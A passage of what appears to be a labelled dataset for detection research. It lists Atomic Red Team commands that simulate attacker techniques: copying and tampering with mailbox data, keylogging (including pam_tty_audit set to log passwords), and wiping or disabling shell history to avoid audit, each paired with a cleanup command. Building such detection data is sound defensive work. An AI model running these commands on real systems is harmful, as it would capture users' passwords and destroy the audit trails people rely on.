""C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy"" -Recurse -Force -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1070.008/T1070.008.yaml,Copy and Delete Mailbox Data on Windows,T1070.008,"[""T1070.008""]",windows,0.9,False,"Copies and deletes mail data on Windows ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1ef0bbbcfa0b1c766ee6cbb0,"Remove-Item -Path ""C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy"" -Recurse -Force -ErrorAction Ignore","Remove-Item -Path ""C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy"" -Recurse -Force -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1070.008/T1070.008.yaml,Copy and Delete Mailbox Data on Windows,T1070.008,"[""T1070.008""]",windows,0.55,True,"Copies and deletes mail data on Windows ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review eb5b2c3777b8cbccec133360,"mkdir -p /var/spool/mail/copy && for file in /var/spool/mail/*; do if [ ""$(basename ""$file"")"" != ""copy"" ]; then cp -R ""$file"" /var/spool/mail/copy/; fi; done && rm -rf /var/spool/mail/copy/*","mkdir -p /var/spool/mail/copy && for file in /var/spool/mail/*; do if [ ""$(basename ""$file"")"" != ""copy"" ]; then cp -R ""$file"" /var/spool/mail/copy/; fi; done && rm -rf /var/spool/mail/copy/*",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1070.008/T1070.008.yaml,Copy and Delete Mailbox Data on Linux,T1070.008,"[""T1070.008""]",linux,0.9,False,"Copies and deletes mail data on Linux ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review dea29b6b5adceb05bf6f5232,"rm -rf /var/spool/mail/copy if [ -f ""$(ls -A /var/spool/mail/temp)"" ]; then rm /var/spool/mail/temp; fi","rm -rf /var/spool/mail/copy if [ -f ""$(ls -A /var/spool/mail/temp)"" ]; then rm /var/spool/mail/temp; fi",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1070.008/T1070.008.yaml,Copy and Delete Mailbox Data on Linux,T1070.008,"[""T1070.008""]",linux,0.55,True,"Copies and deletes mail data on Linux ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 33ab380918b79fbe54c26dcc,mkdir ~/Library/Mail/copy cp -R ~/Library/Mail/* ~/Library/Mail/copy rm -rf ~/Library/Mail/copy/*,mkdir ~/Library/Mail/copy cp -R ~/Library/Mail/* ~/Library/Mail/copy rm -rf ~/Library/Mail/copy/*,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1070.008/T1070.008.yaml,Copy and Delete Mailbox Data on macOS,T1070.008,"[""T1070.008""]",macos,0.9,False,"Copies and deletes mail data on macOS ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3f219c8cd54847a7f57a7145,rm -rf ~/Library/Mail/copy,rm -rf ~/Library/Mail/copy,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1070.008/T1070.008.yaml,Copy and Delete Mailbox Data on macOS,T1070.008,"[""T1070.008""]",macos,0.55,True,"Copies and deletes mail data on macOS ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d249a8bbc56788f71b88dbe7,"New-Item -Path ""C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy"" -ItemType Directory -ErrorAction Ignore Get-ChildItem -Path ""C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data"" -Exclude copy | ForEach-Object { Copy-Item -Path $_.FullName -Destination ""C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy"" -Recurse -Force -ErrorAction Ignore } Get-ChildItem -Path ""C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy"" -File | ForEach-Object { Add-Content -Path $_.FullName -Value ""Modification for Atomic Red Test"" -ErrorAction Ignore }","New-Item -Path ""C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy"" -ItemType Directory -ErrorAction Ignore Get-ChildItem -Path ""C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data"" -Exclude copy | ForEach-Object { Copy-Item -Path $_.FullName -Destination ""C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy"" -Recurse -Force -ErrorAction Ignore } Get-ChildItem -Path ""C:\Users\$env:USERNAME\AppData\Local\Comms\Unistore\data\copy"" -File | ForEach-Object { Add-Content -Path $_.FullName -Value ""Modification for Atomic Red Test"" -ErrorAction Ignore }",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1070.008/T1070.008.yaml,Copy and Modify Mailbox Data on Windows,T1070.008,"[""T1070.008""]",windows,0.9,False,"Copies and modifies mail data on Windows ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review acc1d8d41a71555e352ddf1f,"mkdir -p /var/spool/mail/copy; for file in /var/spool/mail/*; do if [ ""$(basename ""$file"")"" != ""copy"" ]; then cp -R ""$file"" /var/spool/mail/copy/; if [ -f ""/var/spool/mail/copy/$(basename ""$file"")"" ]; then echo ""Modification for Atomic Red Test"" >> ""/var/spool/mail/copy/$(basename ""$file"")""; fi; fi; done","mkdir -p /var/spool/mail/copy; for file in /var/spool/mail/*; do if [ ""$(basename ""$file"")"" != ""copy"" ]; then cp -R ""$file"" /var/spool/mail/copy/; if [ -f ""/var/spool/mail/copy/$(basename ""$file"")"" ]; then echo ""Modification for Atomic Red Test"" >> ""/var/spool/mail/copy/$(basename ""$file"")""; fi; fi; done",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1070.008/T1070.008.yaml,Copy and Modify Mailbox Data on Linux,T1070.008,"[""T1070.008""]",linux,0.9,False,"Copies and modifies mail data on Linux ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d05ace1242b4922edd1d93c5,"mkdir ~/Library/Mail/copy cp -R ~/Library/Mail/* ~/Library/Mail/copy echo ""Manipulated data"" > ~/Library/Mail/copy/manipulated.txt","mkdir ~/Library/Mail/copy cp -R ~/Library/Mail/* ~/Library/Mail/copy echo ""Manipulated data"" > ~/Library/Mail/copy/manipulated.txt",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1070.008/T1070.008.yaml,Copy and Modify Mailbox Data on macOS,T1070.008,"[""T1070.008""]",macos,0.9,False,"Copies and modifies mail data on macOS ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c194486c4b9488864f8bab25,"&""$PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1"" -LogPath #{filepath}","&""$PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1"" -LogPath #{filepath}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.001/T1056.001.yaml,Input Capture,T1056.001,"[""T1056.001""]",windows,0.9,False,"Utilize PowerShell and external resource to capture keystrokes [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1) Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1) Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4a973641be32c9351a905c20,Remove-Item $env:TEMP\key.log -ErrorAction Ignore,Remove-Item $env:TEMP\key.log -ErrorAction Ignore,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.001/T1056.001.yaml,Input Capture,T1056.001,"[""T1056.001""]",windows,0.55,True,"Utilize PowerShell and external resource to capture keystrokes [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1) Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1) Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9dcd2b89e70840932aa70411,"if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi; if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi; sudo touch /tmp/password-auth.bk sudo touch /tmp/system-auth.bk sudo echo ""session required pam_tty_audit.so enable=* log_password"" >> /etc/pam.d/password-auth sudo echo ""session required pam_tty_audit.so enable=* log_password"" >> /etc/pam.d/system-auth","if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi; if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi; sudo touch /tmp/password-auth.bk sudo touch /tmp/system-auth.bk sudo echo ""session required pam_tty_audit.so enable=* log_password"" >> /etc/pam.d/password-auth sudo echo ""session required pam_tty_audit.so enable=* log_password"" >> /etc/pam.d/system-auth",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.001/T1056.001.yaml,Living off the land Terminal Input Capture on Linux with pam.d,T1056.001,"[""T1056.001""]",linux,0.9,False,"Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges. Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root i",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5c2af491365f552c11c0a186,sudo cp -f /tmp/password-auth.bk /etc/pam.d/password-auth sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth,sudo cp -f /tmp/password-auth.bk /etc/pam.d/password-auth sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.001/T1056.001.yaml,Living off the land Terminal Input Capture on Linux with pam.d,T1056.001,"[""T1056.001""]",linux,0.55,True,"Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges. Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root i",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review efc3bb7a66c16d5346dbfb25,"PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t ""$USER[$$] $SSH_CONNECTION "")' echo ""\$PROMPT_COMMAND=$PROMPT_COMMAND"" tail /var/log/syslog","PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t ""$USER[$$] $SSH_CONNECTION "")' echo ""\$PROMPT_COMMAND=$PROMPT_COMMAND"" tail /var/log/syslog",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.001/T1056.001.yaml,Logging bash history to syslog,T1056.001,"[""T1056.001""]",linux,0.9,False,"There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable ""if set"" will be executed before the PS1 variable and can be configured to write the latest ""bash history"" entries to the syslog. To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bas",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 44979164091bd0a7f5b35a05,unset PROMPT_COMMAND,unset PROMPT_COMMAND,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.001/T1056.001.yaml,Logging bash history to syslog,T1056.001,"[""T1056.001""]",linux,0.55,True,"There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable ""if set"" will be executed before the PS1 variable and can be configured to write the latest ""bash history"" entries to the syslog. To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bas",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9c1bd4440c36d339994fd980,"PS2=`logger -t ""$USER"" -f ~/.sh_history` $PS2 tail /var/log/messages","PS2=`logger -t ""$USER"" -f ~/.sh_history` $PS2 tail /var/log/messages",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.001/T1056.001.yaml,Logging sh history to syslog/messages,T1056.001,"[""T1056.001""]",linux,0.9,False,"There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable ""if set"" will be executed before the PS1 variable and can be configured to write the latest ""bash history"" entries to the syslog. To gain persistence the command could be added to the users .shrc or .profile ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e4bd105b34fd1a04647642f6,unset PS2,unset PS2,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.001/T1056.001.yaml,Logging sh history to syslog/messages,T1056.001,"[""T1056.001""]",linux,0.55,True,"There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable ""if set"" will be executed before the PS1 variable and can be configured to write the latest ""bash history"" entries to the syslog. To gain persistence the command could be added to the users .shrc or .profile ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 17a18cd4acab7b6f137900b4,"trap 'echo ""$(date +""%d/%m/%y %H:%M:%S.%s"") $USER $BASH_COMMAND"" >> #{output_file}' DEBUG echo ""Hello World!"" cat #{output_file}","trap 'echo ""$(date +""%d/%m/%y %H:%M:%S.%s"") $USER $BASH_COMMAND"" >> #{output_file}' DEBUG echo ""Hello World!"" cat #{output_file}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.001/T1056.001.yaml,Bash session based keylogger,T1056.001,"[""T1056.001""]",linux,0.9,False,"When a command is executed in bash, the BASH_COMMAND variable contains that command. For example :~$ echo $BASH_COMMAND = ""echo $BASH_COMMAND"". The trap command is not a external command, but a built-in function of bash and can be used in a script to run a bash function when some event occurs. trap will detect when the BASH_COMMAND variable value changes and then pipe that value into a file, creating a bash session based keylogger. To gain persistence the command could be added to the users .b",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2dd527057d031b926d694204,rm #{output_file},rm #{output_file},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.001/T1056.001.yaml,Bash session based keylogger,T1056.001,"[""T1056.001""]",linux,0.55,True,"When a command is executed in bash, the BASH_COMMAND variable contains that command. For example :~$ echo $BASH_COMMAND = ""echo $BASH_COMMAND"". The trap command is not a external command, but a built-in function of bash and can be used in a script to run a bash function when some event occurs. trap will detect when the BASH_COMMAND variable value changes and then pipe that value into a file, creating a bash session based keylogger. To gain persistence the command could be added to the users .b",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review decc085b3728594ea1290244,"cp -v /etc/pam.d/sshd /tmp/ echo ""session required pam_tty_audit.so disable=* enable=* open_only log_passwd"" >> /etc/pam.d/sshd systemctl restart sshd systemctl restart auditd ssh #{user_account}@localhost whoami sudo su whoami exit exit","cp -v /etc/pam.d/sshd /tmp/ echo ""session required pam_tty_audit.so disable=* enable=* open_only log_passwd"" >> /etc/pam.d/sshd systemctl restart sshd systemctl restart auditd ssh #{user_account}@localhost whoami sudo su whoami exit exit",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.001/T1056.001.yaml,SSHD PAM keylogger,T1056.001,"[""T1056.001""]",linux,0.9,False,"Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8ecda65485da9ccfa34c0c47,cp -fv /tmp/sshd /etc/pam.d/,cp -fv /tmp/sshd /etc/pam.d/,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.001/T1056.001.yaml,SSHD PAM keylogger,T1056.001,"[""T1056.001""]",linux,0.55,True,"Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b256098448c5a894d5436905,"auditctl -a always,exit -F arch=b64 -S execve -k CMDS auditctl -a always,exit -F arch=b32 -S execve -k CMDS whoami; ausearch -i --start now","auditctl -a always,exit -F arch=b64 -S execve -k CMDS auditctl -a always,exit -F arch=b32 -S execve -k CMDS whoami; ausearch -i --start now",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.001/T1056.001.yaml,Auditd keylogger,T1056.001,"[""T1056.001""]",linux,0.9,False,"The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3db606693574f74700f05d7a,systemctl restart auditd,systemctl restart auditd,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.001/T1056.001.yaml,Auditd keylogger,T1056.001,"[""T1056.001""]",linux,0.55,True,"The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c50b767c271fc77ca54283d8,swift #{swift_src} -keylog,swift #{swift_src} -keylog,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.001/T1056.001.yaml,MacOS Swift Keylogger,T1056.001,"[""T1056.001""]",macos,0.9,False,"Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required. Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring. Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74 ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 85008e7b99b0220c7f2fc06a,kill `pgrep swift-frontend`,kill `pgrep swift-frontend`,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1056.001/T1056.001.yaml,MacOS Swift Keylogger,T1056.001,"[""T1056.001""]",macos,0.55,True,"Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required. Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring. Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74 ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ac0c12bd19ea55f6742aaae4,export HISTCONTROL=ignoreboth #{evil_command},export HISTCONTROL=ignoreboth #{evil_command},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Disable history collection,T1562.003,"[""T1562.003""]","linux,macos",0.9,False,"Disables history collection in shells ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 635e12f4b0400507e743e9e1,export HISTSIZE=0 #{evil_command},export HISTSIZE=0 #{evil_command},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Disable history collection (freebsd),T1562.003,"[""T1562.003""]",linux,0.9,False,"Disables history collection in shells ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9cb39e241c2d3db74dd11851,"cp $HISTFILE $HISTFILE.OLD if ((${#HISTFILE[@]})); then echo $HISTFILE; fi echo """" > $HISTFILE if [ $(wc -c <$HISTFILE) -gt 1 ]; then echo ""$HISTFILE is larger than 1k""; fi ls -la $HISTFILE cat $HISTFILE history -c if [ $(history |wc -l) -eq 1 ]; then echo ""History cache cleared""; fi","cp $HISTFILE $HISTFILE.OLD if ((${#HISTFILE[@]})); then echo $HISTFILE; fi echo """" > $HISTFILE if [ $(wc -c <$HISTFILE) -gt 1 ]; then echo ""$HISTFILE is larger than 1k""; fi ls -la $HISTFILE cat $HISTFILE history -c if [ $(history |wc -l) -eq 1 ]; then echo ""History cache cleared""; fi",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Clear bash history,T1562.003,"[""T1562.003""]",linux,0.9,False,"An attacker may clear the bash history cache and the history file as their last act before logging off to remove the record of their command line activities. In this test we use the $HISTFILE variable throughout to 1. confirms the $HISTFILE variable is set 2. echo """" into it 3..5 confirm the file is empty 6 clear the history cache 7. confirm the history cache is empty. This is when the attacker would logoff. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 53e56cd53e6be41ad5b20e3f,mv -f $HISTFILE.OLD $HISTFILE,mv -f $HISTFILE.OLD $HISTFILE,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Clear bash history,T1562.003,"[""T1562.003""]",linux,0.55,True,"An attacker may clear the bash history cache and the history file as their last act before logging off to remove the record of their command line activities. In this test we use the $HISTFILE variable throughout to 1. confirms the $HISTFILE variable is set 2. echo """" into it 3..5 confirm the file is empty 6 clear the history cache 7. confirm the history cache is empty. This is when the attacker would logoff. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0e7296b7bda84dd5da78109c,"TEST=$(echo $HISTCONTROL) if [ ""$HISTCONTROL"" != ""ignoreboth"" ]; then export HISTCONTROL=""ignoreboth""; fi history -c ls -la $HISTFILE # "" ls -la $HISTFILE"" if [ $(history |wc -l) -eq 1 ]; then echo ""ls -la is not in history cache""; fi if [ ""$HISTCONTROL"" != ""erasedups"" ]; then export HISTCONTROL=""erasedups""; fi history -c ls -la $HISTFILE ls -la $HISTFILE ls -la $HISTFILE if [ $(history |wc -l) -eq 2 ]; then echo ""Their is only one entry for ls -la $HISTFILE""; fi","TEST=$(echo $HISTCONTROL) if [ ""$HISTCONTROL"" != ""ignoreboth"" ]; then export HISTCONTROL=""ignoreboth""; fi history -c ls -la $HISTFILE # "" ls -la $HISTFILE"" if [ $(history |wc -l) -eq 1 ]; then echo ""ls -la is not in history cache""; fi if [ ""$HISTCONTROL"" != ""erasedups"" ]; then export HISTCONTROL=""erasedups""; fi history -c ls -la $HISTFILE ls -la $HISTFILE ls -la $HISTFILE if [ $(history |wc -l) -eq 2 ]; then echo ""Their is only one entry for ls -la $HISTFILE""; fi",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Setting the HISTCONTROL environment variable,T1562.003,"[""T1562.003""]",linux,0.9,False,"An attacker may exploit the space before a command (e.g. "" ls"") or the duplicate command suppression feature in Bash history to prevent their commands from being recorded in the history file or to obscure the order of commands used. In this test we 1. sets $HISTCONTROL to ignoreboth 2. clears the history cache 3. executes ls -la with a space in-front of it 4. confirms that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups 6. clears the history cache 7..9 executes ls -la $HIS",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3b098056c94ffca06b0cdbe9,export HISTCONTROL=$(echo $TEST),export HISTCONTROL=$(echo $TEST),bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Setting the HISTCONTROL environment variable,T1562.003,"[""T1562.003""]",linux,0.55,True,"An attacker may exploit the space before a command (e.g. "" ls"") or the duplicate command suppression feature in Bash history to prevent their commands from being recorded in the history file or to obscure the order of commands used. In this test we 1. sets $HISTCONTROL to ignoreboth 2. clears the history cache 3. executes ls -la with a space in-front of it 4. confirms that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups 6. clears the history cache 7..9 executes ls -la $HIS",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d2ee218f273a4c59c06de86e,"TEST=$(echo $HISTFILESIZE) echo $HISTFILESIZE export HISTFILESIZE=0 echo ""runnning some commands to populate the history"" whoami groups if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo ""\$HISTFILESIZE is zero""; else HIST_LENGHT=$(wc -l $HISTFILE); echo ""\$HISTFILESIZE is not zero, history lenght is $HIST_LENGHT""; fi","TEST=$(echo $HISTFILESIZE) echo $HISTFILESIZE export HISTFILESIZE=0 echo ""runnning some commands to populate the history"" whoami groups if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo ""\$HISTFILESIZE is zero""; else HIST_LENGHT=$(wc -l $HISTFILE); echo ""\$HISTFILESIZE is not zero, history lenght is $HIST_LENGHT""; fi",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Setting the HISTFILESIZE environment variable,T1562.003,"[""T1562.003""]",linux,0.9,False,"An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system. Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7b61d238021142a61c59c9f0,"echo $HISTSIZE export HISTSIZE=0 echo ""runnning some commands to populate the history"" whoami groups if [ $(echo $HISTSIZE) -eq 0 ]; then echo ""\$HISTSIZE is zero""; else HIST_LENGTH=$(wc -l $HISTFILE); echo ""\$HISTSIZE is not zero, history size is $HIST_LENGTH""; fi","echo $HISTSIZE export HISTSIZE=0 echo ""runnning some commands to populate the history"" whoami groups if [ $(echo $HISTSIZE) -eq 0 ]; then echo ""\$HISTSIZE is zero""; else HIST_LENGTH=$(wc -l $HISTFILE); echo ""\$HISTSIZE is not zero, history size is $HIST_LENGTH""; fi",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Setting the HISTSIZE environment variable,T1562.003,"[""T1562.003""]",linux,0.9,False,"An Adversary may set the sh history files size environment variable (HISTSIZE) to zero to prevent the logging of commands to the history file after they log out of the system. Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3b1fd6c623a1da1105d25492,export HISTSIZE=100,export HISTSIZE=100,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Setting the HISTSIZE environment variable,T1562.003,"[""T1562.003""]",linux,0.55,True,"An Adversary may set the sh history files size environment variable (HISTSIZE) to zero to prevent the logging of commands to the history file after they log out of the system. Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 657ac6c8ed360e7a9e480015,"TEST=$(echo $HISTFILE) echo $HISTFILE export HISTFILE=""/dev/null"" echo ""runnning some commands to populate the history"" whoami groups if [ $(echo $HISTFILE) == ""/dev/null"" ]; then echo ""\$HISTFILE is /dev/null""; else HIST_LENGHT=$(wc -l $HISTFILE); echo ""\$HISTFILE is not /dev/null, history lenght is $HIST_LENGHT""; fi","TEST=$(echo $HISTFILE) echo $HISTFILE export HISTFILE=""/dev/null"" echo ""runnning some commands to populate the history"" whoami groups if [ $(echo $HISTFILE) == ""/dev/null"" ]; then echo ""\$HISTFILE is /dev/null""; else HIST_LENGHT=$(wc -l $HISTFILE); echo ""\$HISTFILE is not /dev/null, history lenght is $HIST_LENGHT""; fi",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Setting the HISTFILE environment variable,T1562.003,"[""T1562.003""]",linux,0.9,False,"An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system. Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d8bc03cf973cbc23d2053cce,export HISTFILE=$(echo $TEST),export HISTFILE=$(echo $TEST),bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1562.003/T1562.003.yaml,Setting the HISTFILE environment variable,T1562.003,"[""T1562.003""]",linux,0.55,True,"An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system. Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null. 